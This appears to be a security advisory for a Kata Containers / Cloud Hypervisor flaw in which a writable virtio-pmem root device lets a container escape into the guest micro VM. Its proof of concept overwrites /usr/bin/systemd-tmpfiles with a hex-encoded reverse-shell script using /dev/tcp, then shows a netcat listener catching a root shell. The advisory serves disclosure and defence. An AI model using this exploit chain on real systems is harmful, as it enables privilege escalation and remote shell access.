PT-2026-20875 · Go · Github.Com/Kata-Containers/Kata-Containers/Src/Runtime
Published
2026-02-19
·
Updated
2026-02-19
CVSS v4.0
5.2
Medium
| Vector | AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H |
Summary
An issue in Kata with Cloud Hypervisor allows a user of the container to modify the file system used by the Guest micro VM ultimately achieving arbitrary code execution as root in said VM. The current understinding is this doesn’t impact the security of the Host or of other containers / VMs running on that Host (note that arm64 QEMU lacks NVDIMM read-only support: It is believed that until the upstream QEMU gains this capability, a guest write could reach the image file).
Details
Linux virtio-pmem
The
virtio-pmem probe path always registers the region as a generic pagemap that supports asynchronous flushes, but it never marks the region as read-only. Only the ND REGION PAGEMAP and ND REGION ASYNC bits are set before the region is created, so nd region->ro always stays cleared and the block device is left writable.Later,
pmem attach disk() wires the region into the block layer with full read/write semantics – the block device operations call pmem do write() which performs cache-flushed memcpy operations directly into the host-provided shared memory window. nvdimm check and set ro() would set the disk read-only if the region had been flagged as such, but because virtio pmem never sets that flag, the helper becomes a no-op.Cloud-Hypervisor virtio pmem
discard writes=on causes the file backing the virtio-pmem device to be opened read-only and mapped with MAP PRIVATE rather than MAP SHARED. That combination means the guest can modify the private copy of the mapped pages, but those modifications never propagate back to the underlying file. The guest (and Cloud Hypervisor process) will still read the modified data because it lives in the private copy of the mapping, so write-then-read sequences appear to succeed even though nothing is persisted. Once the mapping is dropped or the VM is restarted, those copy-on-write changes disappear, leaving the backing file unchanged.Kata /dev/pmem0
Kata boots each pod/VM by DAX-mapping a read-only guest image from the host into the VM and telling the guest kernel to mount the resulting
/dev/pmem* device as its root filesystem.
Since DAX maps the backing file directly into guest memory, there is no way for the hypervisor to intercept or reject individual stores, so a container with sufficient permissions can open /dev/pmem0 and observe its own writes until the VM is rebooted or the cache is dropped.PoC
When putting all this together, this means that a user of a Container (not necessarily privileged, we don’t need
CAP SYS ADMIN, but we need CAP MKNOD) can modify the Guest OS filesystem, replacing libraries or binaries to achieve arbitrary code execution outside of the Container. This requires computing offsets of files within the device, which requires information like the partition start sector, sector size in bytes, the filesystem block size, and the physical block index of the file.To achieve execution on the Guest, I replaced
/usr/bin/systemd-tmpfiles with a connect-back shell to localhost: timers end up executing 15min after boot.
I use debugfs to not require mounting privileges and work directly with the filesystem on /dev/pmem0p1 to get the absolute offset of the file to modify in the device.If you want a simpler PoC, just
dd write something into /dev/pmem0 and observe it's dd readable until discarded.root@ab5392da44ce:~# mknod /dev/pmem0 b 259 0
root@ab5392da44ce:~# mknod /dev/pmem0p1 b 259 1
root@ab5392da44ce:~# python pmem.py --file /usr/bin/systemd-tmpfiles --write --pattern 23212f62696e2f626173680a62617368202d69203e26202f6465762f7463702f3132372e302e302e312f34343320303e26310a6578697420300a
=== Resolution ===
Partition device: /dev/pmem0p1 (pmem0p1)
Partition start (sectors): 2048
Sector size (bytes): 512
Partition start (bytes): 1048576
Filesystem block size: 4096
File path: /usr/bin/systemd-tmpfiles
File offset (bytes): 0
Logical block index: 0
Intra-block offset: 0
Physical block index: 40668
→ Absolute pmem offset: 167624704
[*] Raw read (64 bytes at 167624704):
09fdc000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
09fdc010 03 00 3e 00 01 00 00 00 20 66 00 00 00 00 00 00 |..>..... f......|
09fdc020 40 00 00 00 00 00 00 00 48 82 01 00 00 00 00 00 |@.......H.......|
09fdc030 00 00 00 00 40 00 38 00 0d 00 40 00 20 00 1f 00 |....@.8...@. ...|
[+] Wrote 58 bytes at absolute offset 167624704. Verifying...
09fdc000 23 21 2f 62 69 6e 2f 62 61 73 68 0a 62 61 73 68 |#!/bin/bash.bash|
09fdc010 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f | -i >& /dev/tcp/|
09fdc020 31 32 37 2e 30 2e 30 2e 31 2f 34 34 33 20 30 3e |127.0.0.1/443 0>|
09fdc030 26 31 0a 65 78 69 74 20 30 0a |&1.exit 0.|
root@ab5392da44ce:~# nc -lvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:44880.
bash: cannot set terminal process group (329): Inappropriate ioctl for device
bash: no job control in this shell
root@localhost:/#
root@localhost:/# ps auxw
ps auxw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 17280 1920 ? Ss 16:16 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 16:16 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 16:16 0:00 [pool workqueue release]
root 4 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-rcu gp]
root 5 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-sync wq]
root 6 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-slub flushwq]
root 7 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-netns]
root 9 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/0:0H-events highpri]
root 10 0.0 0.0 0 0 ? I 16:16 0:01 [kworker/0:1-events power efficient]
root 12 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-mm percpu wq]
root 13 0.0 0.0 0 0 ? I 16:16 0:00 [rcu tasks trace kthread]
root 14 0.0 0.0 0 0 ? S 16:16 0:00 [ksoftirqd/0]
root 15 0.0 0.0 0 0 ? I 16:16 0:00 [rcu sched]
root 16 0.0 0.0 0 0 ? S 16:16 0:00 [rcu exp par gp kthread worker/1]
root 17 0.0 0.0 0 0 ? S 16:16 0:00 [rcu exp gp kthread worker]
root 18 0.0 0.0 0 0 ? S 16:16 0:00 [migration/0]
root 19 0.0 0.0 0 0 ? S 16:16 0:00 [cpuhp/0]
root 20 0.0 0.0 0 0 ? S 16:16 0:00 [kdevtmpfs]
root 21 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-inet frag wq]
root 22 0.0 0.0 0 0 ? S 16:16 0:00 [kauditd]
root 23 0.0 0.0 0 0 ? S 16:16 0:00 [oom reaper]
root 24 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-writeback]
root 25 0.0 0.0 0 0 ? S 16:16 0:00 [kcompactd0]
root 26 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-cryptd]
root 27 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-kblockd]
root 28 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/0:1H]
root 29 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:1-events unbound]
root 30 0.0 0.0 0 0 ? S 16:16 0:00 [kswapd0]
root 31 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-xfsalloc]
root 32 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-xfs mru cache]
root 33 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/u257:0]
root 34 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-kthrotld]
root 36 0.0 0.0 0 0 ? S 16:16 0:00 [irq/25-ACPI:Ged]
root 37 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-nfit]
root 38 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/0:2-virtio vsock]
root 39 0.0 0.0 0 0 ? S 16:16 0:00 [hwrng]
root 40 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:2-events unbound]
root 41 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-vfio-irqfd-cleanup]
root 42 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-mld]
root 43 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-ipv6 addrconf]
root 81 0.0 0.0 0 0 ? S 16:16 0:00 [jbd2/pmem0p1-8]
root 82 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-ext4-rsv-conversion]
root 99 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:3]
root 105 0.0 0.0 62032 2568 ? Ssl 16:16 0:02 /usr/bin/kata-agent
chrony 117 0.0 0.0 10692 540 ? S 16:16 0:02 /usr/sbin/chronyd -F 1
chrony 120 0.0 0.0 10560 460 ? S 16:16 0:00 /usr/sbin/chronyd -F 1
root 122 0.2 1.0 44876 31556 ? S 16:16 0:11 python -m server
message+ 124 0.0 0.0 8120 384 ? Ss 16:16 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 129 0.0 0.0 0 0 ? S 16:16 0:00 [cpuhp/1]
root 130 0.0 0.0 0 0 ? S 16:16 0:00 [migration/1]
root 131 0.0 0.0 0 0 ? S 16:16 0:00 [ksoftirqd/1]
root 132 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/1:0-mm percpu wq]
root 133 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/1:0H-events highpri]
root 134 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/1:1H]
root 142 0.0 0.0 5400 2220 pts/0 Ss 16:16 0:00 bash -l
root 145 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/1:1]
root 323 0.0 0.1 13212 3448 pts/0 R+ 16:17 0:00 nc -lvp 443
root 329 0.0 0.0 4780 256 ? Ss 16:31 0:00 /bin/bash /usr/bin/systemd-tmpfiles --clean
root 330 0.0 0.0 5048 512 ? S 16:31 0:00 bash -i
root 377 0.0 0.0 7480 256 ? R 17:33 0:00 ps auxw
root@localhost:/#
Impact
Container to Guest micro VM Escape (no escape to Host, no persistence of the overwritten image)
Fix
Incorrect Permission
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Github.Com/Kata-Containers/Kata-Containers/Src/Runtime